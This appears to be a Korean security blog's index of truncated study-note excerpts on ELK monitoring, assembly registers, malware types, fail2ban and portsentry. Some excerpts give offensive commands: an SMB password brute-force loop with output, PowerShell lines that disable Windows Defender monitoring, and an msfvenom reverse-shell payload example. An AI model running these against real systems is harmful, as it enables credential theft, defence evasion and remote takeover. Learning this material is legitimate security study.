ELK 등장 배경모니터링ssh : 접속시 시스템정보를 제공. snmp : snmp work를 실행하여 OID값을 취합하여 정보를 확인. 단, 갱신 시간 텀이 5분이라는 단점이 존재. 트래픽이 많기 떄문. 현제는 네트워크의 속도, 서버의 퍼포먼스, 저장소 용량이 모두 증가 --> 클라우드의 등장. 클라우드로 인해 과거와 달리 다른 네트워크가 하나의 도매인으로 묶여 서버팜을 형성 시킬 수 있음. 따라서 네트워크가 대규모로 이루어짐.보안솔루션은 대부분 국지적 특성을 가짐.해당 네트워크와 도메인은 같은 지역적 위치를 가짐.--> 통합 관리가 필요하다. snmp의 Cacti나 mrtg같은 경우 부하가 심함. 이를 그나마 분산구축을 통해 부하를 줄일 수 있음.ESM(Enterprise Security Menage..
프로그램의 구조.: 3개의 Sectionsection.data--> static / local 선언 및 초기화 변수가 정의되는 곳. 상수, 파일 명, 버퍼 사이즈를 선언 section .txt --> 실제 실행할 코드를 작성하는 곳 section .bbs --> 초기화가 안된 추가적인 변수가 구성되는 곳 레지스터 범용 레지스터 (4가지)RAX : A : Accumulator : 계산기 더하기 / 빼기 등 산술/논리 연산을 수행하며 함수의 return값이 저장된다. 결과값 --> 주소 RBX : B : Base : 메모리 주소를 저장하기 위한 용도로 사용된다. --> 변수 간접 번지 지정 : 참조 데이터 타입 ---> Value, 변수를 저장한다. RCX : C : Co..
바이러스 / 악성코드바이러스: 시스템 내부에서 또 다른 파일을 감염시킴부트 바이러스MBR 부트 파티션을 감염시킨다. --> 포멧을 해도 살아남음트로이안 바이러스정상 프로그램의 사이에서 동작. --> 파일의 크기가 변형되는것으로 알 수 있음. 이미 감염된 파일을 다시 감염 시킬 수 있음. 이를 막기위해 특정 signiture를 넣어둠. 악성코드 레지스트리(Registry) --> 윈도우 운영에 필요한 정보가 포함된 DB레지스트리를 변경시키는 등으로 특정 시스템을 변경시킴.: 사용자에게 허가받지 않은 일련의 행동을 수행하는 프로그램 악성코드 분석 1. Process분석: 프로그램이 실행 되었을 때 동작을 통해 발생하는 시스템의 변경점을 파악 2. 파일 분석.:파일로써의 특성을 파악.(Ex : 생성일자(mt..
1. CMD 명령을 통한 공유파일(Null Section 포함) BruteForce예제 : C:\Users\TJ>for /L %i in (1230,1,1235) do net use \\172.16.1.1\smb /USER:smb %iC:\Users\TJ>net use \\172.16.1.1\smb /USER:smb 1230시스템 오류 86이(가) 생겼습니다.지정된 네트워크 암호가 맞지 않습니다.C:\Users\TJ>net use \\172.16.1.1\smb /USER:smb 1231시스템 오류 86이(가) 생겼습니다.지정된 네트워크 암호가 맞지 않습니다.C:\Users\TJ>net use \\172.16.1.1\smb /USER:smb 1232시스템 오류 86이(가) 생겼습니다.지정된 네트워크 암호가 ..
Powershell 이용: cmd에서 powershell을 실행"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction Ignore;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction Ignore;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $..
MSF_venomMetasploit의 독립 실행형 페이로드 생성기.msfpayload 및 msfencode의 대체 도구. 옵션Useage/usr/bin/msfvenom [options] Example/usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe -o payload.exe Options-l, --list [type]에 해당하는 모든 모듈을 나열. 사용할 수 있는 유형: payloads, encoders, nops, platforms, archs, encrypt, formats, all-p, --payload 사용할 페이로드 ..
fail2banfail : 시스템 접근시 로그인 실패. 일정 횟수 시스템 접근 인증 실패시 해당 IP를 특정 기간동안 접근 금지시키는 툴. Installdnf --enablerepo=epel -y install fail2ban Setting참조 파일, 소켓 , 이메일 등 설정vim /etc/fail2ban/fail2ban.conf 차단 시간, 적용할 서비스, 차단 조건, 차단 해제 조건 등 설정vim /etc/fail2ban/jail.conf [sshd]enabled = truebantime = 10mfindtime = 10mmaxretry = 5[DEFAULT]# iptables 사용banaction = iptables-multiport Starting[root@rocky-9 fail2ban]# sy..
설명Honey Pot을 통하여 해당 포트(tcp:32774)에 접근시 Port Scanning으로 판단하는 프로그램.Port Scanning으로 판단시 Shell 스크립트를 실행하도록 설정 가능. 기본적으로 route add -host [ip] reject를 통한 라우팅 테이블을 통한 응답 거부 및 TCP Wrapper를 통한 접근 제어 가능. TCP Wrapper는 IP 및 도메인 호스트 기반 ACL으로 /etc/hosts.deny, /etc/hosts.allow파일이 존재. 설치apt-get install portsentry -y 설정 옵션/etc/postsentry/postsentry.conf에 있음.# 감지할 포트TCP_PORTS="1,11,15,79,111,119,143,540,635,1080..
